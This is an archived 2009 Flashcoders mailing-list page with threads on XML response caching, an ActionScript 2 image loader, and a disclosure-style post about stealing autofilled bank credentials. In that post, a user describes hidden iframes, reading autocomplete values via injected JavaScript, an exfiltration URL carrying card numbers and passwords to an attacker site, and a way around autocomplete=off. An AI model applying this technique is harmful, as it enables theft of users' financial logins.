Re: [Flashcoders] XML loading. Why file is cached, but script response is not?

2009-04-04 Thread Paul Andrews
Because the file is a script not static text the results returned by the 
script could change even though the URL remains the same.


Paul
- Original Message - 
From: Pavel Repkin pavel.rep...@gmail.com

To: flashcoders@chattyfig.figleaf.com
Sent: Saturday, April 04, 2009 6:55 AM
Subject: [Flashcoders] XML loading. Why file is cached,but script response 
is not?




Hey!
My program loads XML data from the server.
I want the data to cache, so the loading happens only once.
When I load a simple xml file from the server, the caching works like a
charm.

But when I load xml from a Perl script response, the cache does not work.
The data are being loaded every time I call XML.load(...)
The request URL is simple and does not change over time: 
http://repkasoft.com/cgi-bin/test/responseCache/provider.pl;


Do you know why caching does not work for script response?
Is it possible to make it work?
___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders 


___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders


Re: [Flashcoders] XML loading. Why file is cached, but script response is not?

2009-04-04 Thread Juan Pablo Califano
By default, most content generated by server side languages don't carry
along cache information in the http response header. But you can add them
manually, so the client can decide whether to use a cached copy of the
resource or request a fresh one.

Check this link:

http://www.mnot.net/cache_docs/#IMP-SCRIPT

Cheers
Juan Pablo Califano
2009/4/4 Pavel Repkin pavel.rep...@gmail.com

 Hey!
 My program loads XML data from the server.
 I want the data to cache, so the loading happens only once.
 When I load a simple xml file from the server, the caching works like a
 charm.

 But when I load xml from a Perl script response, the cache does not work.
 The data are being loaded every time I call XML.load(...)
 The request URL is simple and does not change over time: 
 http://repkasoft.com/cgi-bin/test/responseCache/provider.pl;


 Do you know why caching does not work for script response?
 Is it possible to make it work?
 ___
 Flashcoders mailing list
 Flashcoders@chattyfig.figleaf.com
 http://chattyfig.figleaf.com/mailman/listinfo/flashcoders

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders


[Flashcoders] field value theft from flash banners and xss exploited forms, or outright malicious websites

2009-04-04 Thread Anthony Pace
I was wondering if anyone here knew that this was possible and that it, 
according to some sources that this is one of the reasons it wasn't 
implemented in chrome:


I thought of this over two years ago; yet, never did anything with it 
(lazy... really lazy... plus I am not criminal).


Flash banners that inject javascript, xss exploited forms, or outright 
malicious websites,  can place hidden iframes that load a bunch of bank 
login sites, and using javascript take advantage of auto complete form 
fill functions that require no user interaction, by reading the value of 
the input fields.  Once you have the user's card# or login and pass, you 
can dynamically create and load a script tag with the src set to 
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blahbankcard=blahpass=blah 
and you have sent the data to a remote location.  If interaction is 
required for the auto complete function to work, get javascript to cycle 
through the ascii and cycle focus back and forth from the field till 
their is a value change.


The user would of course signed up for a hotmail account, through a 
proxy, and used that hotmail account to setup a geocities account.  I 
know this wouldn't get everyone; yet, if you put it on a linkshare site, 
I am betting a hacker could just watch the collected info pour in.


I got it to work on my laptop for a locally hosted site, (on I won't 
tell with what browser and what parameters) and I am thinking about 
submitting a proof of concept; yet, I am wondering if anyone else wrote 
about this first, if I just missed it, and if there is someone else's 
proof of concept it would look like I was ripping off?

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders


Re: [Flashcoders] field value theft from flash banners and xss exploited forms, or outright malicious websites

2009-04-04 Thread Anthony Pace

 input type=text name=email autocomplete=off 

just realized that you would have to replace the text field in the 
submission form if it has autocomplete=off, and by redrawing the form 
getting autocomplete to work its magic and have your JS go through the 
testing process.



Anthony Pace wrote:
I was wondering if anyone here knew that this was possible and that 
it, according to some sources that this is one of the reasons it 
wasn't implemented in chrome:


I thought of this over two years ago; yet, never did anything with it 
(lazy... really lazy... plus I am not criminal).


Flash banners that inject javascript, xss exploited forms, or outright 
malicious websites,  can place hidden iframes that load a bunch of 
bank login sites, and using javascript take advantage of auto complete 
form fill functions that require no user interaction, by reading the 
value of the input fields.  Once you have the user's card# or login 
and pass, you can dynamically create and load a script tag with the 
src set to 
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blahbankcard=blahpass=blah 
and you have sent the data to a remote location.  If interaction is 
required for the auto complete function to work, get javascript to 
cycle through the ascii and cycle focus back and forth from the field 
till their is a value change.


The user would of course signed up for a hotmail account, through a 
proxy, and used that hotmail account to setup a geocities account.  I 
know this wouldn't get everyone; yet, if you put it on a linkshare 
site, I am betting a hacker could just watch the collected info pour in.


I got it to work on my laptop for a locally hosted site, (on I won't 
tell with what browser and what parameters) and I am thinking about 
submitting a proof of concept; yet, I am wondering if anyone else 
wrote about this first, if I just missed it, and if there is someone 
else's proof of concept it would look like I was ripping off?

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders


___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders


[Flashcoders] Loading MC

2009-04-04 Thread Karl DeSaulniers

Hello,
I was wondering if anyone can point me in the rigth direction.
I have been trying for days now to figure this out.
I know there is some little thing I am missing
and its probably right under my nose so to speak.

Here is my code:

//--
// Start Image loader
//--

import com.martijndevisser.ImageLoader;

_root.stage_mc.attachMovie(LargePic,LargePic +  
ID,this.getNextHighestDepth());

_root.stage_mc[LargePic + ID].ID = ID;
_root.stage_mc[LargePic + ID]._x = originalX;
_root.stage_mc[LargePic + ID]._y = originalY;
var mcProgress:Number = 0;

var checkLoader:Object = new Object();
checkLoader.onLoadStart = function(target:MovieClip):Void  {
trace(Start Width: + _root.stage_mc[LargePic + ID].previewW);
trace(Start Height: + _root.stage_mc[LargePic + ID].previewH);
_root.stage_mc[LargePic + ID].newPic.spiralLoader._visible = true;
_root.stage_mc[LargePic + ID].newPic.spiralLoader.gotoAndPlay(2);
};
checkLoader.onLoadComplete = function(target:MovieClip) {
target = _root.stage_mc[LargePic + ID].newPic.Image_mc;
_root.stage_mc[LargePic + ID].newPic.percentCom.text = ;
_root.stage_mc[LargePic + ID].newPic.spiralLoader.stop();
_root.stage_mc[LargePic + ID].newPic.spiralLoader.gotoAndStop(1);
_root.stage_mc[LargePic + ID].newPic.spiralLoader._visible = false;
target._width = target._width / 3;
target._height = target._height / 3;
	_root.stage_mc[LargePic + ID].previewW = _root.stage_mc[LargePic  
+ ID].newPic._width;
	_root.stage_mc[LargePic + ID].previewH = _root.stage_mc[LargePic  
+ ID].newPic._height;

trace(End Width: + _root.stage_mc[LargePic + ID].previewW);
trace(End Height: + _root.stage_mc[LargePic + ID].previewH);
};
checkLoader.onLoadProgress = function(target:MovieClip,  
bytesLoaded:Number, bytesTotal:Number):Void  {

mcProgress = Math.ceil((bytesLoaded / bytesTotal) * 100);
	_root.stage_mc[LargePic + ID].newPic.percentCom.text =  
mcProgress.toString() + %;

};
var loader:ImageLoader = new ImageLoader(_root.stage_mc[LargePic +  
ID].newPic.Image_mc);

loader.addListener(checkLoader);
loader.loadImage(_global.projectPic,_root.stage_mc[LargePic +  
ID].newPic.Image_mc);


//--
// End Image Loader
//--


To explain further, I have a oversized image loading at first which  
is sized down 3 times.
Once it sizes down, I want previewW and previewH to equal the new  
width and height.
Everything loads fine, it loads and the progress runs and it resizes  
fine,
but when I hit my resize button to make it smaller, the variables  
previewW and previewH
take on the dimensions of _root.stage_mc[LargePic +  
ID].newPic.Image_mc  before anything was loaded into it.
(my resize button works off of the previewW and previewH vairables,  
this info is just FYI)

var fitSizeW:Number = previewW;
var fitSizeH:Number = previewH;
var maxSizeW:Number = (previewW * 3);
var maxSizeH:Number = (previewW * 3);
var minSizeW:Number = (previewW / 3);
var minSizeH:Number = (previewH / 3);

Note: I have to keep previewW and previewH also because I have a  
mousescroll attached to that variable as well.


I have a feeling that because the ImageLoader class loads a dummy MC  
for the bitmap
and then removes it to place the img MC for smoothing, my script is  
not getting the final value
of what is loaded into it and so previewW and previewH do not inherit  
its final values, just its beginning values.
There is a background bitmap that gets replaced by the loaded image  
that is in the MC when it is placed on stage.

This is the beginning value.

This is in AS2 BTW.

Any help would be GREATLY appreciated at this point.

THX

Karl DeSaulniers
Design Drumm
http://designdrumm.com

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders